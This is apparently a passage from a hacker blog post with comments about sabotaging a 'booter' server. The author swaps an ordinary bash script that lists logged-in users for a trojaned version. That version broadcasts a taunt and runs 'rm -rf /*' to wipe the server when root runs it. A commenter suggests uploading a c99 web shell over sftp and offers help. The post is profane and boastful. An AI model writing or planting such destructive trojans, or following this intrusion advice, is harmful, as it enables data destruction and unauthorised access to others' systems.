#!/bin/bash
clear
echo "+==================================+"
echo "+--------------------------------------------------------------------+"
echo "+---------------------------whos on-----------------------------+"
echo "+--------------------------------------------------------------------+"
echo "+--------------------------------------------------------------------+"
w
echo "press any key when done"
read
It was set to read only so all that was needed was me to rm -rf the script then replace it with my own version:
#!/bin/bash
clear
echo "+================================+"
echo "+-----------------------lol heckers lol---------------------+"
echo "+----------- XBL RUNNING CANCELED------------+"
echo "+-------------8==============D O:--------------+"
echo "+---------------------------------------------------------------+"
wall I been hecked
rm -rf /*
echo "press any key when done"
read
Now all that was left to do was wait for the root user to run my script and lulz could be had as the silly message was broadcast and server reformatted.
Lol big hecker 0xE9!
ReplyDeleteSup fuckers. This is codevade.
ReplyDeleteIf you want to attack a quote on quote "putty booter" then all you need is a non-jailed root ssh account. Which is usually what they give out for your login. You can then from there install php and upload a c99 through sftp.
I would be glad to assist if anyone needs help with this. PM me here http://www.hackforums.net/private.php?action=send&uid=209490
Uploading a C99 shell is no use as
ReplyDelete1 it wasn't running any sort of HTTPD
2 A shell running as the HTTPD user would allow us less access than our non jailed shell account.
We wanted full root to rm -rf (which was easier than expected).
Good job, those skids buying $9 a month unmetered santrex vps's with 256 mb ram 100 mb line claiming they have 2gb ram and 1 gbps line are just as bad as some shell booter owners (they sell lifetime for $5 too)
ReplyDelete@BlackHops - They are exactly the SAME.
ReplyDelete